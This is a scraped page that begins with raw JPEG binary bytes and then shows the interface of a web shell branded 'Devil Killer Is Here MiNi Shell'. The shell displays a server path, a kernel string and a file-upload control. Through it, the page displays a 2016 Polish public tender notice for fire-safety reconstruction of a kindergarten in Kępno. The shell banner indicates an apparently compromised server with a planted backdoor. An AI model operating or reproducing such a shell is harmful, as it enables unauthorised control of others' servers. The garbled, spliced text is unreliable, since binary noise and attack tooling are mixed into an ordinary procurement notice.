JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/143737-N-2016.html

<p class="kh_header"><b>Kępno: Przebudowa Przedszkola Samorządowego nr 2 w Kępnie celem dostosowania obiektu do obowiązujących przepisów przeciwpożarowych.</b><br>
<b>Numer ogłoszenia: 143737 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Samorządowe Nr 2 w Kępnie , Ul. Wawrzyniaka 40, 63-600 Kępno, woj. wielkopolskie, tel. 62 7822236, faks 62 7822236.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: przedszkole samorządowe..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Przedszkola Samorządowego nr 2 w Kępnie celem dostosowania obiektu do obowiązujących przepisów przeciwpożarowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 

1.	Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z wykonaniem i odbiorem zadania inwestycyjnego pn.: Przebudowa Przedszkola Samorządowego nr2 w Kępnie celem dostosowania obiektu do obowiązujących przepisów przeciwpożarowych. Budynek zlokalizowany jest przy ul. Wawrzyniaka 40 w Kępnie. na działkach ewidencyjnych 1661/1 i 1953/2. Roboty budowlane należy prowadzić zgodnie z zatwierdzoną dokumentacja projektową, ekspertyza techniczną, przedmiarem, specyfikacja techniczną oraz wiedzą techniczną. 
2.	Szczegółowy zakres robót objętych kontraktem - opis przedmiotu zamówienia został przedstawiony 
w projekcie budowlanym, przedmiarach, Specyfikacji Technicznej Wykonania i Odbioru Robót oraz ekspertyzie technicznej które stanowią załączniki do niniejszej SIWZ.
3.	DANE OGÓLNE PRZEDMIOTU ZAMÓWIENIA: 
1)	Roboty budowlane związane z wykonaniem systemów oddymiania klatek schodowych, 
2)	Montaż czujek adresowalnych oraz centrali (wg projektu zamiennego), 
3)	Montaż oprawa oświetleniowych awaryjnych zewnętrznych,
4)	Klapę oddymiających o powierzchni geometrycznej,
5)	Roboty budowlane związane z wykonaniem drogi pożarowej. Wykonując drogę pożarową należy wykonać roboty budowlane związane m.in. :
a)	z zabezpieczeniem  istniejącego przyłącza gazowego. Należy odpowiednio zabezpieczyć przyłącze gazowe podczas przemieszczania się pojazdów specjalistycznych (bojowych). Zabezpieczenie musi przenosić obciążenia przewidziane dla drogi pożarowej oraz umożliwić w przyszłości wymianę rury bez wykonywania rozbiórki powstałej drogi. 
b)	z usunięciem drzew oraz karpiny zgodnie z decyzją nr OŚ-141-16 z dnia 08.06.2016r. W miejscu usunięcia drzew należy wykonać również drogę pożarową. Wykonawca zobowiązany jest do wykonania nasadzeń zastępczych w ilości 12szt. żywotnika zachodniego. Drzewa muszą posiadać obwód pnia minimum 2cm mierzonego na wysokości 100cm. Lokalizacja nasadzeń zostanie wskazana przez Zamawiającego.   
6)	Roboty instalacji elektrycznych zewnętrznych, wewnętrznych i oznaczenie dróg ewakuacyjnych, montaż centrali ppoż. 
Roboty budowlane należy rozpocząć od klatki schodowej K1 (w trakcie prowadzenia robót budowlanych w klatce K1 nie należy wykonywać robót budowlanych w klatce K2). W przypadku nie zakończenia robót budowlanych dotyczących klatki schodowej K1 do 01.09.2016r. należy odpowiednio zabezpieczyć, przygotować oraz klatkę schodową do tymczasowego użytkowania. 
Z dniem 01.09.2016r. w godzinach od 6:00 do 17:00 w budynku odbywać się będą zajęcia przedszkolne (rozpoczęcie roku szkolnego). Harmonogram robót budowlanych należy prowadzić tak aby nie utrudniać użytkowania budynku w roku szkolnym. (np. prowadzić roboty budowlane w godzinach innych niż jest czynna palcówka oświatowa lub weekendy lub dostosować harmonogram robót do godzin funkcjonowania budynku). 
Roboty budowlane związane z wykonaniem drogi pożarowej należy rozpocząć z dniem 01.10.2016r. (w okresie od 01-30.09.2016r. odbywają się zajęcia w ogrodzie)
Godziny w których odbywa leżakowanie dzieci (przerwa na sen) nie należy prowadzić uciążliwych robót budowlanych (hałas).  

W cenie  zamówienia należy również ująć:
1.	Dostawa materiałów budowlanych może odbywać się tylko od ul. Wawrzyniaka. 
2.	Drzwi które zastaną zdemontowane podczas wykonywania robót budowlanych należy zamontować w innych otworach drzwiowych wskazanych przez Zamawiającego (przed montażem drzwi należy uwzględnić demontaż starej ościeżnicy).
3.	Pomieszczenia, w których prowadzone będą roboty budowlane, podczas których powstaną ubytki w tynku należy w całości przemalować (2 krotnie) m.in. klatki schodowe, hol na parterze, ciągi komunikacyjne. Kolor do uzgodnienia z Zamawiającym. 
4.	Bramę wjazdową na plac zabaw należy wykonać dwuskrzydłową  o szerokości 5,00m, wysokości 1,50m. Brama z kształtownika wypełniona siatką panelową. Obok bramy należy wykonać również furtkę o szerokości 1,20m, wysokości 1,50m, z kształtownika wypełnioną siatką panelową. Bramę 
i furtkę należy pomalować farbą antykorozyjną.    
5.	Roboty budowlane związane z wykonaniem drogi pożarowej można rozpocząć najwcześniej 22.07.2016r.  
6.	W ramach zadania należy przesunąć  oraz ponownie zamontować elementy placów zabaw poza obszar budowy drogi pożarowej. 
7.	Wykonawca jest zobowiązany przygotować wszystkie elementy/dokumenty niezbędne do uzyskania pozwolenia na użytkowanie w tym m.in. oznaczenie dróg ewakuacyjnych, montaż sprzętu gaśniczego w ilości określonej w projekcie budowlanym oraz ekspertyzie technicznej. 


Zamówieniem objęte są również:
1)	wykonanie wszelkich robót i czynności związanych z prawidłową realizacją zamówienia, nawet w przypadku, gdy nie zostały one ujęte przetargowym przedmiarze robót,
2)	pełna obsługa geodezyjna budowy: wytyczenie,  inwentaryzacja powykonawcza (2 egzemplarze), 
3)	wszelkie naprawy urządzeń nad- i podziemnych uszkodzonych podczas wykonywania robót,
4)	dopełnienie wszelkich zaleceń wynikających z wszystkich uzgodnień branżowych,
5)	przeprowadzenie wszelkich robót i czynności związanych z odbiorem przedmiotu zamówienia i przekazaniem go do eksploatacji, itp. - niezbędne do uzyskania pozwolenia na użytkowanie
6)	zabezpieczenie bezpieczeństwa na placu budowy i wokół niego oraz ubezpieczenie budowy,
7)	inne czynności wynikające z przepisów branżowych bądź specyfiki zamówienia.

Wykonawca zamówienia winien przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. 
Bezwzględnie należy zapoznać się z dokumentacją techniczną (budowlaną) zadania.
Zalecane jest wcześniejsze zapoznanie przez Wykonawcę się z terenem, na którym będą realizowane roboty stanowiące przedmiot niniejszego zamówienia oraz elementami uzbrojenia podziemnego i nadziemnego na terenie realizacji robót i jego sąsiedztwie. Wykonawca nie będzie mógł żądać dodatkowego wynagrodzenia z tytułu nieuwzględnienia okoliczności w/w, a okoliczności te nie będą mogły stanowić także wystarczającego powodu dla Wykonawcy, aby nie mógł rozpocząć robót w wyznaczonym terminie.
Sposób realizacji przedmiotu zamówienia określa projekt umowy, który stanowi integralną część niniejszej specyfikacji (załącznik 4).
   
1) Oferty równoważne:
Zamawiający dopuszcza złożenie ofert równoważnych. 
Użyte w projekcie, STWIOR czy przedmiarze robót  nazwy urządzeń, materiałów oraz ich  parametry techniczne i wymiary, które mogłyby wskazywać lub kojarzyć się z producentem lub firmą nie mają na celu preferowania materiału, urządzenia czy wyrobu danego producenta ani wskazać na dany wyrób, lub element. Ciężar udowodnienia, że materiał jest równoważny w stosunku do wymogów określonych przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty, opisujące parametry techniczno - jakościowe, wymagane prawem certyfikaty i inne dokumenty, dopuszczające dane materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one równoważne (pod rygorem odrzucenia oferty).

2) Urządzenia równoważne.
Urządzenia równoważne zaproponowane w ofercie powinny posiadać parametry techniczne, jakościowe i materiałowe nie gorsze od opisanych w projekcie i STWIOR. Jeżeli zamawiający nie sprecyzował w STWIOR parametrów jakie będzie brał pod uwagę przy ocenie równoważności urządzeń urządzenia równoważne powinny mieć zbliżoną (do 5%) wydajność (punkt pracy )  oraz: 
- identyczne wykonanie materiałowe;
- nie gorszą klasę energetyczną  (zużycie energii); 
- równą bądź lepszą sprawność;
Wykonawca, w ofercie jest obowiązany wskazać wszystkich producentów i typy zastosowanych urządzeń zamiennych - równoważnych oraz wykazać, że oferowane przez niego dostawy, spełniają wymagania określone przez Zamawiającego.
Równoważność zostanie oceniona na etapie oceny ofert. Oferty, które nie spełnią wymagań opisanych przez Zamawiającego zostaną odrzucone.

3) Materiały równoważne
Wymagania Zamawiającego odnośnie jakości i zastosowanych materiałów określa Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR) która będzie podstawowym dokumentem przy odbiorze robót oraz ocenie czy proponowane materiały są równoważne i  spełniają oczekiwania Zamawiającego. Zamawiający dopuści do stosowania tylko materiały o parametrach nie gorszych niż opisane w STWiOR..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-0, 45.11.12.20-6, 45.26.23.00-4, 45.26.27.00-8, 45.41.00.00-4, 45.26.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.00.00-0, 45.31.10.00-0, 45.34.30.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku. Wykonawca zobowiązany jest przedłożyć
oświadczenie według zapisów punktu 9.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku: Zamawiający uzna warunek posiadania
wiedzy i doświadczenia za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym
okresie, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co
najmniej 1 robotę budowlaną o wartości minimum 200 000zł brutto, polegającą na wykonaniu robót
budowlanych w budynkach użyteczności publicznej wg definicji zawartej w rozporządzeniu Ministra
Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych jakim powinny
odpowiadać budynki i ich usytuowanie (Dz.U. 2002.75.690) (w przypadku wspólnego ubiegania się o
udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku
dotyczyć będzie wszystkich wykonawców łącznie); Ocena spełniania w/w warunku udziału w
postępowaniu dokonana zostanie według zapisów punktu 9.1. niniejszej SIWZ. W przypadku, gdy
Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest
udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku. Wykonawca zobowiązany jest przedłożyć
oświadczenie według zapisów punktu 9.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia, w zakresie niezbędnym, warunek dotyczący
dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, iż dysponuje co
najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia, legitymująca się
doświadczeniem zawodowym odpowiednim do funkcji, jaka zostanie jej powierzona. Wykonawca
przedstawi co najmniej jedną osobę na stanowisko Kierownika Budowy, który spełnia następujące
wymagania: - posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności wkonstrukcyjno - budowlanej bez ograniczeń w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo
budowlane (Dz. U. z 2010 nr 243 poz. 1623 ze zm.) lub odpowiadające im równoważne uprawnienia
w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów -
zgodnie z polskim Prawem Budowlanym, przynależącą do właściwej izby samorządu zawodowego,
Zamawiający określając ww. wymogi dopuszcza odpowiadające im uprawnienia budowlane wydane
obywatelom państw EOG oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych
przepisów ustawy Prawo Budowlane (Dz. U. z 2010r. Nr 243 poz. 1623 ze zm.) oraz ustawy o
zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii
Europejskiej (Dz. U. z 2008r. Nr 63 poz. 394), Ocena spełnienia warunków zostanie dokonana wg
formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku. Wykonawca zobowiązany jest przedłożyć
oświadczenie według zapisów punktu 9.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do Oferty należy załączyć wymagane w SIWZ dokumenty i oświadczenia 1) pisemne zobowiązanie podmiotów
do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia,
sporządzone według treści wzoru Załącznik nr 9 do SIWZ; 2) informacja o części zamówienia powierzonych
podwykonawcom na podstawie art. 26 ust. 2b - załącznik nr 10 do SIWZ (jeżeli dotyczy) 3) informacja o części
zamówienia powierzonych podwykonawcom - załącznik nr 11 do SIWZ (jeżeli dotyczy) 4)informacja
Wykonawcy dotycząca powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku
VAT (załącznik nr 12 do SIWZ) Wykonawca, pod rygorem stwierdzenia uchylania się od podpisania umowy,
przed podpisaniem Umowy przedłoży: a) dokument lub dokumenty potwierdzające prawo osób składających
podpis pod umową do występowania w imieniu Wykonawcy i dokonywania w jego imieniu składania
oświadczenia woli (pełnomocnictwo, wypis z rejestru lub centralnej ewidencji); b) potwierdzenie wniesienia
zabezpieczenia należytego wykonania umowy; c) kosztorys ofertowy; Dane z kosztorysu ofertowego, będą
podstawą do obliczenia wynagrodzenia należnego wykonawcy z tytułu wykonania części przedmiotu
zamówienia w sytuacji odstąpienia od umowy. d) opłacona polisa , a w przypadku jej braku inny dokument
potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności związanej z przedmiotem zamówienia na kwotę odpowiadającą wartości kontraktu e) harmonogram rzeczowo-finansowy robót</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - okres gwarancji - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
1. Z zastrzeżeniem postanowień ustępów 2, 3 i 6 niniejszego rozdziału niedopuszczalne są istotne zmiany
postanowień zawartej umowy w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy. 2.
Dopuszczalne są jednak za zgodą Zamawiającego istotne zmiany zawartej umowy, pod warunkiem, że
dotyczą choćby jednej z kwestii określonych w ustępie 3 niniejszego rozdziału. 3. Zmiany, o których mowa w
ust. 2, mogą dotyczyć: 1) podwyższenia jakości, 2) zmiany w kolejności i terminach wykonywania robót
budowlanych oraz końcowego terminu wykonania umowy. 4. Jeżeli zmiany, o których mowa w ust. 3,
wymagają zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót
budowlanych, strona inicjująca zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian
wraz z informacją - o konieczności lub nie - zmiany pozwolenia na budowę oraz przedmiar i niezbędne rysunki.
Projekt taki wymaga akceptacji projektanta, nadzoru autorskiego i zatwierdzenia do realizacji przez
Zamawiającego. 5. Warunkiem dokonania zmian, o których mowa w ust. 3, jest złożenie wniosku przez
stronęinicjującą zmianę zawierającego: 1) opis propozycji zmiany umowy, 2) uzasadnienie zmiany umowy, 3)
obliczenie kosztów zmiany, 4) opis wpływu zmiany na harmonogram robót i termin wykonania umowy. 6.
Zmiany, o których mowa w ust. 3, mogą zostać dokonane, jeżeli za ich wprowadzeniem przemawia choćby
jedna z niżej wymienionych okoliczności: 1) obniżenie kosztu wykonania robót lub kosztu eksploatacji
(użytkowania) obiektu, 2) poprawa wartości lub podniesienia sprawności i jakości ukończonych robót
budowlanych, 3) zmiana obowiązujących przepisów, 4) podniesienie bezpieczeństwa wykonywania robót, 5)
usprawnienia w trakcie użytkowania obiektu, 6) opóźnienia, utrudnienia, zawieszenia robót lub przeszkody
spowodowane przez Zamawiającego lub innego wykonawcę zatrudnionego przez Zamawiającego na terenie
budowy, 7) zaistnienie nieprzewidzianych warunków geologicznych, hydrogeologicznych, wykopalisk,
niekorzystnych warunków atmosferycznych - niskie temperatury poniżej minus 5 stopni w ciągu doby
uniemożliwiające prowadzenie prac, opady śniegu powyżej 15 cm grubości pokrywy a także innych przeszkód
lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach, 8) siła wyższa. 7.
